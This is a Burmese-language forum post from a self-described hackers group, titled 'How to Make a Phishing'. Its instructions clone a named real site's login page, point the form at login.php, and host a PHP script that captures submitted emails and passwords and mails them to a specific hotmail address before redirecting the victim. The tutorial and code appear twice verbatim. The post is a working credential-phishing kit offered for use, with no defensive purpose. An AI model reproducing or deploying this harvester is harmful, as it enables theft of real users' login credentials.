How to Make a Phishing
- Posted by ေျမြျဖဴ
on November 15, 2011 at 8:23pm in Myanmar Hackers Group
- Back to Myanmar Hackers Group Discussions
ဒါကေတာ့
ကိုယ္တုိင္လုပ္နည္းဘဲေပ့ါဗ်ာ...
ကိုလုပ္ခ်င္တဲ့ ဆုိဒ္ကိုသြားလုိက္ ..
ကြ်န္ေတာ္ကေတာ့ ဥပမာ အေနနဲ ့ျမန္မာဆုိဒ္တစ္ခုကို သုံးျပသြားမယ္ဗ်ာ...
အင္းစဥ္းစားလုိက္မယ္... Security ေတာင့္တဲ့ဆုိဒ္...
http://crazybag.ning.com
ဆုိပါေတာ့ဗ်ာ..
သူ ့ login page ကုိ Down လုိက္ဗ်ာ..
http://crazybag.ning.com/main/authorization/signIn
ျပီးရင္ ေဒါင္းထားတဲ့ဖုိင္ကို notepad နဲ ့ဖြင့္လုိက္..
ျပီးရင္ Ctrl+f နုိပ္လုိက္..
box ေလးတစ္ခုက်လာရင္ action=" လို ့ထည့္လုိက္ ျပီးရင္ Find next ကိုနုိပ္လုိက္ ေတြ ့လိမ့္မယ္...
ဒါဆုိရင္
form action="http://crazybag.ning.com/main/authorization/doSignIn
ဆုိျပီးေတြ ့မယ္ဗ်ာ...
http://crazybag.ning.com/main/authorization/doSignIn ဆုိတဲ့ေနရာမွာ..
login.php လုိ ့ထည့္လုိက္...
ဒါဆုိရင္..
form action="login.php"
ဆုိျပီးျဖစ္သြားမယ္...
ျပီးရင္ notepad ကိုဖြင့္လုိက္..
ေအာက္ကကုဒ္ကို ကူးျပီးေတာ့ login.php လုိ ့ထည့္လုိက္ပါ...
<?php
//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: www.mcg.it.tc');
?>
ျပီးရင္ အဲ့ဖုိင္ ႏွစ္ခုကို upload တင္ျပီးလုိက္ လုပ္ေပေတာ့....
ကိုလုပ္ခ်င္တဲ့ ဆုိဒ္ကိုသြားလုိက္ ..
ကြ်န္ေတာ္ကေတာ့ ဥပမာ အေနနဲ ့ျမန္မာဆုိဒ္တစ္ခုကို သုံးျပသြားမယ္ဗ်ာ...
အင္းစဥ္းစားလုိက္မယ္... Security ေတာင့္တဲ့ဆုိဒ္...
http://crazybag.ning.com
ဆုိပါေတာ့ဗ်ာ..
သူ ့ login page ကုိ Down လုိက္ဗ်ာ..
http://crazybag.ning.com/main/authorization/signIn
ျပီးရင္ ေဒါင္းထားတဲ့ဖုိင္ကို notepad နဲ ့ဖြင့္လုိက္..
ျပီးရင္ Ctrl+f နုိပ္လုိက္..
box ေလးတစ္ခုက်လာရင္ action=" လို ့ထည့္လုိက္ ျပီးရင္ Find next ကိုနုိပ္လုိက္ ေတြ ့လိမ့္မယ္...
ဒါဆုိရင္
form action="http://crazybag.ning.com/main/authorization/doSignIn
ဆုိျပီးေတြ ့မယ္ဗ်ာ...
http://crazybag.ning.com/main/authorization/doSignIn ဆုိတဲ့ေနရာမွာ..
login.php လုိ ့ထည့္လုိက္...
ဒါဆုိရင္..
form action="login.php"
ဆုိျပီးျဖစ္သြားမယ္...
ျပီးရင္ notepad ကိုဖြင့္လုိက္..
ေအာက္ကကုဒ္ကို ကူးျပီးေတာ့ login.php လုိ ့ထည့္လုိက္ပါ...
<?php
//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: www.mcg.it.tc');
?>
ျပီးရင္ အဲ့ဖုိင္ ႏွစ္ခုကို upload တင္ျပီးလုိက္ လုပ္ေပေတာ့....
http://akarphyoe.mixxt.at
မွ ကူးယူတင္ျပသည္။
0 comments:
Post a Comment